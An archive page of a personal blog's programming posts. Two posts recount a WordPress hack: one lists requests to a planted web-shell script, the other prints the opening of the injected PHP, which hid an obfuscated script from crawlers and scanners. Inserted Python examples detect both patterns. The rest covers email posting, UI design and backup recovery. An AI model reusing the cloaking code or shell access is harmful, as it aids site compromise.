Category Archives: programming

Blog Hack – a bit more info.

The security team at my ISP (Dreamhost) found yet more infection in my blog.  The appearance of a WordPress blog can vary by installing different themes.  In the directory of one of these themes they found a file containing a tool for giving a remote user a shell prompt (there is a version of the script here).  The theme in question is not a standard WordPress theme; it is a variant I wrote up a while back.  I used it for a while a long time ago.  Which means the URL to access this was obscure.

I only retain logs for a month.  But on Jan 13th 84.3.40.172 pulled it once; notably that visit didn’t include a user agent, making me think it was only enqueuing me for further work.
On the 14th 86.106.170.114 came to visit (his user agent string was “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5”) and he proceeded to:

…php
…php?d=/home/<myusername>/enthusiasm.cozy.org/
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&e=wp-settings.php
…php?d=/home/<myusername>/
…php?d=/home/

I assume that last step was to check if other users on the server might happen to have left their directories unprotected.
My current somewhat baseless guess is that this has been infecting my installation since April of 2008.  So, it is not unlikely that I brought the infection with me when I moved to Dreamhost in Oct 2008.
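
A log check for the request pattern described above, as an added example that is not part of the original post: it flags direct requests to PHP files inside a theme directory, missing user agents, and the d=, ef=, e= and edit= parameters from the excerpt. The log lines, addresses, theme name and file name are constructed, and the Combined Log Format is an assumption about how the server logs.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed format (Combined Log Format):
# ip - - [time] "METHOD target HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# WordPress loads themes through index.php, so a direct hit on a theme's
# PHP file is already unusual.
THEME_PHP = re.compile(r"^/wp-content/themes/[^/]+/.+\.php$", re.I)
SHELL_PARAMS = {"d", "ef", "e", "edit"}  # parameter names from the post's log excerpt

# Constructed sample lines (documentation addresses, placeholder theme and file).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Jan/2010:04:11:02 -0800] "GET /wp-content/themes/example-theme/example.php HTTP/1.1" 200 5120 "-" "-"
198.51.100.7 - - [14/Jan/2010:09:30:15 -0800] "GET /wp-content/themes/example-theme/example.php?d=/home/user/blog.example.org/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
198.51.100.7 - - [14/Jan/2010:09:30:41 -0800] "GET /wp-content/themes/example-theme/example.php?d=/home/user/blog.example.org/&ef=wp-settings.php&edit=1 HTTP/1.1" 200 18200 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
203.0.113.5 - - [14/Jan/2010:10:02:00 -0800] "GET /index.php?p=42 HTTP/1.1" 200 7000 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.5.5"
203.0.113.5 - - [14/Jan/2010:10:02:01 -0800] "GET /wp-content/themes/default/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.5.5"
"""

def reasons_for(line):
    """Return (ip, [reasons]) for a suspicious line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["target"])
    if not THEME_PHP.match(url.path):
        return None
    query = parse_qs(url.query, keep_blank_values=True)
    found = ["direct request to a theme PHP file"]
    if m["ua"] in ("", "-"):
        found.append("no user agent")
    if SHELL_PARAMS.intersection(query):
        found.append("file-manager style parameters")
    if any(v.startswith("/") for v in query.get("d", [])):
        found.append("absolute filesystem path in d=")
    if any(v.endswith(".php") for v in query.get("e", []) + query.get("ef", [])):
        found.append("PHP file named in e=/ef=")
    return m["ip"], found

def scan(log_text):
    """Group the reasons by client address."""
    report = defaultdict(set)
    for line in log_text.splitlines():
        hit = reasons_for(line)
        if hit:
            report[hit[0]].update(hit[1])
    return {ip: sorted(reasons) for ip, reasons in report.items()}

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```
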

Argh, Blog Hacked

This blog uses WordPress plus a very few plugins.  That’s built on PHP.  So, it’s just asking for trouble.

Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working.  I’m a professional, so I provided the Guild’s standard response: “Works for me.”  Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader.  Finally I run the RSS validator on it, which announces there is a <script> tag in the feed.  Eh, what!  I don’t see that doing view source in my browser.  Hm.

Finally I pull the feed with curl and that version has the problem.  Prepended on the RSS feed is a script that is compressed and obfuscated.  The obfuscation means it’s got a lot of unique tokens in it, i.e. CeHxprJ, lJeVYuCF, UYwXC, and Google finds a copy of the script here: http://pastebay.com/82974  but that link has disappeared, presumably because that paste bot has a setting that will discard postings after 24 hours.

The infection in my blog was in wp-settings.php.  A second <php> block had been inserted at the front of the file.  That injected the script into every page, not just the RSS feed.  Here’s the start of that code.  As you can see it isn’t injected into every page; only certain browsers and then only if there aren’t any cookies yet.  That explains why I didn’t see it in my browser, and I assume how “generous in what they accept” RSS readers are explains which people were getting my posts.

<?php
@ob_start();
@error_reporting(0);
if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT']) && strlen($_SERVER['HTTP_USER_AGENT'])>5 && sizeof($_COOKIE)==0) {
print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); }  etc


I removed it.  All the rest of the php files had md5 checksums that match the distribution of WordPress 2.9.1.  Of course I am, presumably, still vulnerable to whatever infected the blog to begin with.

Bleck.
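
One way to catch this kind of cloaked injection from the outside, as an added example that is not part of the original post: request the same URL under several client profiles and compare what comes back. The `infected_site` and `clean_site` stand-ins, the profile names, the user-agent strings and the URL are constructed so the code runs offline; only the user-agent list, the length test and the cookie test come from the snippet above.

```python
import hashlib
import re

# User-agent list taken from the injected PHP shown above.
CLOAK_UA = re.compile(
    r"googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|"
    r"wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|"
    r"blacklist|zeus|norton", re.I)

CLEAN_FEED = '<?xml version="1.0"?><rss version="2.0"><channel></channel></rss>'

def infected_site(url, user_agent, cookies):
    """Constructed stand-in for the compromised blog (same three conditions)."""
    serve = (not CLOAK_UA.search(user_agent)
             and len(user_agent) > 5 and len(cookies) == 0)
    return ("<script>/* placeholder */</script>" if serve else "") + CLEAN_FEED

def clean_site(url, user_agent, cookies):
    """Constructed stand-in for a site that answers every client the same way."""
    return CLEAN_FEED

# Constructed client profiles: (user agent, cookies sent with the request).
PROFILES = {
    "browser with cookies": ("Mozilla/5.0 (Windows NT 5.1) Firefox/3.5.5", {"session": "1"}),
    "browser first visit": ("Mozilla/5.0 (Windows NT 5.1) Firefox/3.5.5", {}),
    "curl": ("curl/7.19.7", {}),
    "crawler": ("Googlebot/2.1", {}),
    "no user agent": ("", {}),
}

def probe(fetch, url, profiles=PROFILES):
    """Fetch url once per profile and group the profiles by response body.

    More than one group means the server answers clients differently, and a
    <script tag inside a feed body is never legitimate.
    """
    variants = {}
    script_served_to = []
    for name, (user_agent, cookies) in profiles.items():
        body = fetch(url, user_agent, cookies)
        digest = hashlib.sha256(body.encode()).hexdigest()
        variants.setdefault(digest, []).append(name)
        if "<script" in body.lower():
            script_served_to.append(name)
    return {
        "cloaked": len(variants) > 1,
        "variants": list(variants.values()),
        "script_served_to": script_served_to,
    }

if __name__ == "__main__":
    print(probe(infected_site, "https://blog.example.org/feed/"))
```

Against a live site, `fetch` would be a small wrapper around an HTTP client; on pages with per-request content, compare only the part of the body before the XML or HTML prolog.
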

Postie

I’m inordinately happy to  have finally puzzled out how to enable posting to my blog via email.  The last few times I’d tried to get this to work something or another ruined my fun.

WordPress tempts you into thinking that you can post by email.  But the built-in mechanism is flawed in enough ways to make it dead to me.  E.g. it can only handle simple mail formats, it can only handle unencrypted POP3, and finally it didn’t work at all.

But, happy day, the WordPress plugin Postie works for me.

It’s a bit complex to get all the toggles set right.  For example I rarely send email in rich text format, but in this case it’s worth it since the converter will handle all the formatting.  Including images.  Floating images!

WordPress tries hard, but the image editing is really too tedious, and its editor is fine; but not as good as the one in my mail program.  And, my mail program there has grammar checking.

Getting all the settings right is delicate.  By default you need to email from the same account your WordPress user id is associated with.  And, you may need to change the email address associated with your admin account for that to work; since I assume it picks the first account it finds.  You will want to check that your blog knows what time zone it’s in, that’s on the general WordPress settings page.  There is also a setting in Postie, but fix the blog’s setting first.  It helped to toggle the “preferred text type” in the Postie message settings to “html.”  And you’ll need yet another email account.

Initially I had all the email originated postings filed under “drafts,” and I recommend that until you think you have all the bugs worked out.  But, I’m somewhat sad to admit, I still fiddle with the final result by hand.  In particular it isn’t quite getting the paragraph breaks right.

Hiding the cursor++

Back in the day I used to write code for graphic user interfaces.  If you write code like that you develop an eye for details that hopefully are invisible to other folks.  For example I happen to know that when you are typing the mouse cursor is hidden and then later when you move the mouse the cursor reappears.  If the mouse cursor doesn’t disappear when I’m typing it causes a bit of cognitive dissonance.

Since I did that kind of work starting in college and then very intensely for the years after the Macintosh was released I’ve had the fun of watching as people tried every possible variation of how they might make a UI work.  I think that search space is pretty well mined out.  Stuff is rediscovered all the time.  Rarely somebody stumbles on a new idea.  Most of the time the computers get faster so things become possible that were just too sluggish to do before.

In recent years as I’ve become interested in how we manage our attention I’ve become increasingly interested in UI schemes that help with that problem.  I’m a huge fan of Readability, a bookmarklet that attempts to glean out only the text you want to read from your web page.  And I like the hack for the Mac, Spirited Away, that automatically hides applications that have fallen into the background on the desktop for some period.  I desperately wish I could find a similar hack that would replace, on demand, the entire screen with the content area (and only the content) of the topmost window.

Those are all examples of hide the clutter when I’m doing something, and they are directly analogous to the hide the cursor when I’m typing.  There is a dearth of good schemes for automatically hiding when I’m reading.

Anyhow the new scheme that Google recently deployed of hiding the clutter on their homepage until you move the mouse pointer is, amusingly, a direct extension of the hide the standard mouse pointer when typing (and he is typing right?).  My silly brain screamed out “bug!” when I first saw this; complete with a diagnosis that the code for mouse pointer hiding was hiding too much stuff.  The same part of my brain then tried to puzzle out how code got the clutter into the top most overlay which includes the mouse cursor.

Who knows?  Maybe it will become standard practice to hide other clutter, in addition to the mouse pointer, upon typing.

Craft of Software Management

Nice list

  • Continuous deployment.
  • Tell a good change from a bad change quickly
  • Revert a bad change quickly
  • Work in small batches (at IMVU, large batch = 3 days worth of work)
  • Break large projects down into small batches
  • Have a cluster immune system
  • Run tests locally. Everyone gets a complete sandbox
  • Continuous integration server – tests to ensure all features that worked before still works
  • Incremental deploy – reject changes that move metrics out of bounds
  • Alerting and predictive monitoring – wake somebody up if metric goes out of bounds. Use historical trends to predict  acceptable bounds.
  • Conduct rapid split tests: A/B testing is key to validating hypotheses
  • Follow the AAAs of metrics: actionable, accessible and auditable

But for heaven’s sake!  Nothing on this list is particularly insightful or new.  All these things were true in 1980.  Have we learned nothing?  Is the schooling around software development so weak that these are news to people?  This list ignores the much more fundamental question of when those rules get broken.  Hint: about half your time will be spent in that state.  But what’s key is knowing when that is a good witch vs. a bad witch.  The only customer/user input or feedback loop in that list is A/B testing.  That is particularly bogus!

Feeling cranky.  The old joke from the 1970s about the software industry:  “I am blessed to have stood on the toes of giants!”

Self Binding Service

Arising from my interest in impulse control, hyperbolic discounting, and will power I have been nursing an interest in how people enforce their personal rules.  Say you wish to promise to go to bed at 10pm, or not to drink before 5pm, or to save 10% of your income, or call your mom once a week: what tools exist to help you keep those promises?  The literature highlights the amusing point that you can’t write contracts with yourself as the counter party and then expect to have recourse to the courts when you break those contracts.

If you keep your eyes open you will notice assorted tools for self binding.  To do lists, reminder services, and date books are simple examples.  There are software applications that will lock out your internet access.  There are savings plans that include a penalty for early withdrawal.  In Arizona you can sign onto a list that requires the casino to deny you access.

Some of the promise keeping aids involve enlisting a third party.  There is a horrible scheme that addicts fall into where they enlist a friend and license him to punish them in some awful manner if they break their promise.  For example they might write a letter which will ruin their professional life if revealed and then give it to the third party.  Once you introduce the third party there are all kinds of risk for abuse.  The third party might extract a promise from a victim during an irrational moment by coercion.  A lightweight example of that is how the salesman at the health club pressures customers into signing up for a subscription.  And then, there are chastity belts.

Some of these promise or binding technologies are designed to remove the temptation entirely.  For example: living in the dry town, never buying the liquor, and avoiding the pub.  And those come in degrees – for example moving the ice cream to the back of the freezer.

I’ve been stewing on what might be the lightest weight service a third party could offer to help individuals with this class of problems.  And I have a theory.  It’s based on the time-lock example used for bank vaults.  In that case the bank wants to remove any possibility of opening the vault for some period of time – usually while the bank is closed.  While obviously the bank’s intent is to keep criminals from stealing their money they actually promise not to open the vault under any circumstances.  They are self binding.  They could have locked the vault with a one time password and given it to a trusted officer of the bank.  They don’t trust themselves.  Apparently the only thing they trust is the people who built the vault.  It’s interesting that if you look at pictures of these time locks they are usually in transparent cases so anybody can visually inspect the mechanism.  They are over engineered and simple which encourages that inspection.

Say you wanted to lock up a present for Christmas day.  You put it in a safe, put it under the tree, and Christmas morning you hand the key to the recipient.  But what if you want to wrap up a present for yourself and you don’t trust yourself not to open it too soon.  Now what?  You could ask the help of a friend, but that’s got other complications.  Can you solve this problem without a third party?  You could if you could buy a time-lock.  I’d love to know of a vendor.  I’ve not found one.  I find that bizarre; surely there are lots of people who’d like to lock things overnight etc.

Anyhow, I’ve built one for you.  It’s based on a bit-o-crypto.  You lock things up by encrypting them, and later when the timer runs out you can decrypt them.  Frustratingly this does involve a third party, my little service.  You get the means to encrypt by going to the service, and later once the timer has run out, you go back to get the means to decrypt.  This depends on public/private keys.  You use the public key to encrypt and the private key to decrypt.

For example say you want to make it much harder to play that damn addictive video game until next Tuesday.  You go grab the public key for next Tuesday and lock away the damn game by encrypting it.  Next Tuesday, or sometime after, you go grab the private key and decrypt the stupid game.

Of course this requires that you trust me to keep the service running and not lose the keys it gin’d up.  I wouldn’t recommend trusting me, yet.  For example I really haven’t tested it much :).

Here’s the service http://hang-on.appspot.com/.  I’d love to hear suggestions for things to do with this, or ways to improve it.

I love a good bug

This is such a great bug.

There’s a rounding-error bug in the camera driver’s autofocus routine (which uses a timestamp) that causes autofocus to behave poorly on a 24.5-day cycle. That is, it’ll work for 24.5 days, then have poor performance for 24.5 days, then work again.

The 17th is the start of a new “works correctly” cycle, so the devices will be fine for a while. A permanent fix is in the works.

So they’re good for the Thanksgiving holidays, but if they don’t get a move on it’s going to ruin Christmas and New Years!

Tell it to the Blog

We have a little joke around the house.  When somebody starts complaining we occasionally lean back and mumble – “Tell it to the blog.”  It’s a cruel and unsympathetic pleasure.  So … I’m here to tell it to the blog.

I love my MacBook Air but for the last week we have fallen into a very abusive relationship.

A little over a week ago the hinge broke.  Mine was purchased a year and half ago and it has a twin bought on the same purchase order.  Its twin’s hinge broke two weeks before mine.  There were small signs of a problem, a slight looseness in the hinge.  But that’s all and that problem had existed for at least a year.

We had little problem getting Apple to fix either of these machines.  They both had the extended warranty.  I dropped mine off on a Monday afternoon and got it back on Thursday evening.  The visit to the Apple store was tedious with an hour plus wait followed by a half hour just to fill in the forms on their very slow computers.  I was delighted that they also fixed a slight stickiness that had developed on the left side of the ‘mouse’ button.

Before returning it I let Time Machine finish a backup to my time capsule.  I then mounted the backup and poked around, copying a few essentials to a temporary user account on another Mac in the house.  I then wiped the disk and installed a virgin release of Leopard with an account for the repair guys to use.

While it was in the shop I pulled one or two needed files from the backup.  That was the first time I noticed a problem.  When I went to mount the backup from the Time Capsule via wifi to another laptop it fell into a check of the disk image.  I let that run for twelve hours, overnight plus, and finally lost patience.  I hit the skip button on the dialog and a while later it mounted the image and I pulled the files I needed.

When I got the repaired machine home I had a load of trouble right out of the box.  I plugged in a USB hub and plugged in the Apple Superdrive and the USB-Ethernet dongle.  That didn’t work.  In fact nothing worked on the USB.  Not my headset, not my printer, not with or without the dongle.  But then I noticed that the System Profiler could see these devices come and go as I plugged them in.  So I fire up an insta-theory that the USB firmware was updated at some point and the virgin copy of Leopard doesn’t like that.  So I take the full suite of updates.  That involves an hour plus in the status “running script” but afterward my USB devices are working again.

Well, except.  I now discover that the Apple Superdrive will not work across a USB hub.  You see Apple decided to make this widget non-standard; presumably for some compelling reason involving my aspirations to be a DVD producer.  Since it won’t work over a hub you can’t have both the machine booted from the install DVD and get the advantages of restoring via the Ethernet dongle.  Well maybe I can mount the DVD remotely.  That doesn’t work for me.  I can mount the disk remotely but when I go to reboot off the disk that doesn’t work.  Much later I puzzle out that you need to be running a special application on the machine that is providing the DVD to do these installs.

You may have noticed that at this point I haven’t gotten to trying to use my backup at all.  But I decide to grab a few more files off the backup so I can get something done in the midst of restoring the machine.  So I try to mount the backup and this time I think I really ought to let that checking run to completion.  So I hook up the Ethernet dongle and let it run.  A few hours later it announces that the backup is broken and suggests I should run Disk Utility to fix it.

So I do.  Hours pass.  It fails.  I try again.  Hours pass.  It fails.

There are numerous discussions on the net of troubles with Time Capsule backups getting corrupted, and there are other discussions of Mac disk images and disk drives getting corrupted.  In fact there are plenty of postings about all file systems getting into bogus states and what to do.  I read lots of these.

Time Machine, at least when backing up to a Time Capsule, writes into a disk image whose format is known as a sparse bundle.  On the Mac bundles are file system folders full of stuff, and the folder is marked so the UI shows it as a single object.  That’s all sort of irrelevant except that if you want to copy or move a bundle you need to be sure to use a tool that respects those markings and of course you’d want to be sure you move all the soft and hard links without changing them.  The command rsync with the -aE (or -avE) switches is a candidate for doing that.  But when I do it I don’t get the special markings, i.e. the extended attributes that the -E switch is intended to get.  And, yes, I did it as root.  Of course you’d rather do your repair attempts on a copy, and better yet if you can get that copy on a fast directly connected drive.  I tried a bit but so far I haven’t puzzled out how to get a working copy of one of these sparse bundles off the Time Capsule.

The advice on how to repair disks or disk images that get corrupted comes in stages.  Stage one: run disk util.  Stage two: run fsck_hfs.  Stage two is actually no different than stage one; but it’s hard to be sure so you try it.  Did I mention that each one of these experiments takes hours and you want to do it twice since you cling to the hope each run is actually improving something.  Stage three: run fsck_hfs and ask it to rebuild the catalog.

At this point I have three complaints from various checking programs.  Something about threads, something about inode size, and something about corrupted journal.  So stage four: turn off the journaling and try again.  Doesn’t help.

Stage five: despair.

Stage six: Consider running some other disk repair software.  There are two.  One is called Disk Warrior (~$100 and they mail you the software), and the other is called TechTool Deluxe.  You get a copy of TechTool Deluxe with your extended warranty.  It’s no help since apparently it can’t see the disk unless I can mount the disk, which I can’t.

Stage seven: try to force the sparse bundle to mount without checking.  I fail at my attempts to do this using the unix command line and return to despair.

Stage eight: try via the Finder.  Doesn’t work on two Macs, but it does work on a third.  That machine says the drive is damaged and that I should backup, erase the drive, etc. immediately.  This makes me snort.

I then copy the latest backup file hierarchy off and heave a huge sigh of relief.

So that’s what I did with most of the last four days of my life.  Still to do is to check all the other sparse bundles on that time capsule, i.e. the backups of other machines in the house.  And then I have to decide what to do so that next time this happens all the details will be different.  I hate computers.